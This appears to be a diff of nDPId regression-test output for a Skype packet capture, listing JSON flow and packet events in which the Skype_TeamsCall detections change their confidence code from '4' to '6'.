00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":608,"source":"skype.pcap","alias":"nDPId-test","flow_id":63,"flow_packet_id":3,"flow_last_seen":1431969659189,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969659189,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0y0dAAEAG3E3AqAEinTg0LMN0AbuAxvN73A2f1IAQECyVyAAAAQEICj4izKhMZDEW"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3kJUAAEARCA3AqAEiQTffEjLdgQkAIzBxm84CB+tg2yEaM9\/bL8TBCQEYokW3ou6uIFeA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":617,"source":"skype.pcap","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.18","src_port":13021,"dst_port":33033,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":79,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":79,"pkt_l4_len":45,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAABBYQoAAEAROAbAqAEinTeCmjLdnEUALTFnm9ACrELw0MyN5alTGXUohI4skjQwNKD1mI1L+u5IA2eq73xPAw=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":618,"source":"skype.pcap","alias":"nDPId-test","flow_id":67,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":37,"flow_tot_l4_payload_len":37,"flow_avg_l4_payload_len":37,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.130.154","src_port":13021,"dst_port":40005,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":71,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":71,"pkt_l4_len":37,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA5DEcAAEARjD7AqAEiQTffLTLdnEwAJedsm9ICSKWpAVcx8I7JZ8adPdtcTNxD1Y7ygdStLzI="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":619,"source":"skype.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":29,"flow_max_l4_payload_len":29,"flow_tot_l4_payload_len":29,"flow_avg_l4_payload_len":29,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAAyadkAAEARfcfAqAEinTg0GDLdnEEAHr+2m9QCPz6lPkIa5+HaiHK3kAac8KWOvw=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":620,"source":"skype.pcap","alias":"nDPId-test","flow_id":69,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.24","src_port":13021,"dst_port":40001,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_packet_id":1,"flow_last_seen":1431969659392,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":67,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":67,"pkt_l4_len":33,"thread_ts_msec":1431969659392,"pkt":"0NQSxnP1PBXCt3IOCABFAAA1BWcAAEAR4iHAqAEinTg0LTLdnEwAIdjym9YCeMy7FyJwEm6ud1zY3LUeAZMSqKDeqQ=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"skype.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659392,"flow_last_seen":1431969659392,"flow_idle_time":200000,"flow_min_l4_payload_len":25,"flow_max_l4_payload_len":25,"flow_tot_l4_payload_len":25,"flow_avg_l4_payload_len":25,"midstream":0,"thread_ts_msec":1431969659392,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.45","src_port":13021,"dst_port":40012,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969659988,"flow_last_seen":1431969659988,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969659988,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"213.199.179.175","src_port":50039,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":635,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":1,"flow_last_seen":1431969659988,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969659988,"pkt":"0NQSxnP1PBXCt3IOCABFAABAwnVAAEAGLQHAqAEi1cezr8N3Abvoukp8AAAAALAC\/\/\/lagAAAgQFtAEDAwUBAQgKPiLPxAAAAAAEAgAA"} 00477{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":638,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":2,"flow_last_seen":1431969660053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969660053,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAADgG93rVx7OvwKgBIgG7w3fqOPcW6LpKfaASOJBSzgAAAgQFrAQCCApO2zrZPiLPxAEDAwk="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":639,"source":"skype.pcap","alias":"nDPId-test","flow_id":71,"flow_packet_id":3,"flow_last_seen":1431969660053,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969660053,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0KCpAAEAGx1jAqAEi1cezr8N3Abvoukp96jj3F4AQECyptwAAAQEICj4i0AVO2zrZ"} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00472{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4bnAAAEARKjLAqAEiQTffETLdnFYAJDJym9gCRkbR2cp0xkwlV8oyn8X0NKXbrbkoGiloQw=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"skype.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"65.55.223.17","src_port":13021,"dst_port":40022,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA4jIYAAEAR1MHAqAEiQAQXnzLdnEkAJMXJm9oCsTdSNq2fp4IomM1W0LtS\/XasnVb1cYIFcA=="} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"skype.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"64.4.23.159","src_port":13021,"dst_port":40009,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":70,"pkt_l4_len":36,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA496cAAEAROH3AqAEinTfrjjLdnFkAJNtLm9wCCq\/Vr9SUD4fwmmEiNdezuQ9niYUSk+YjJQ=="} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":648,"source":"skype.pcap","alias":"nDPId-test","flow_id":74,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":28,"flow_max_l4_payload_len":28,"flow_tot_l4_payload_len":28,"flow_avg_l4_payload_len":28,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.142","src_port":13021,"dst_port":40025,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00469{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":69,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":69,"pkt_l4_len":35,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAA3fJEAAEARs5PAqAEinTfrjzLdnF4AIz7Dm94CUldClJ3Jj\/ar7UJqBheNPI8TcYWyskFm"} -00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00661{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":649,"source":"skype.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":27,"flow_max_l4_payload_len":27,"flow_tot_l4_payload_len":27,"flow_avg_l4_payload_len":27,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.55.235.143","src_port":13021,"dst_port":40030,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00464{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_packet_id":1,"flow_last_seen":1431969660403,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":64,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":64,"pkt_l4_len":30,"thread_ts_msec":1431969660403,"pkt":"0NQSxnP1PBXCt3IOCABFAAAy3tIAAEARCNHAqAEinTg0FTLdnEQAHrtxm+ACoNYW9c0Iu96VtPV4yMd9SlxQuA=="} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":650,"source":"skype.pcap","alias":"nDPId-test","flow_id":76,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969660403,"flow_last_seen":1431969660403,"flow_idle_time":200000,"flow_min_l4_payload_len":22,"flow_max_l4_payload_len":22,"flow_tot_l4_payload_len":22,"flow_avg_l4_payload_len":22,"midstream":0,"thread_ts_msec":1431969660403,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"157.56.52.21","src_port":13021,"dst_port":40004,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Skype_Teams.Skype_TeamsCall","breed":"Acceptable","category":"VoIP"}} 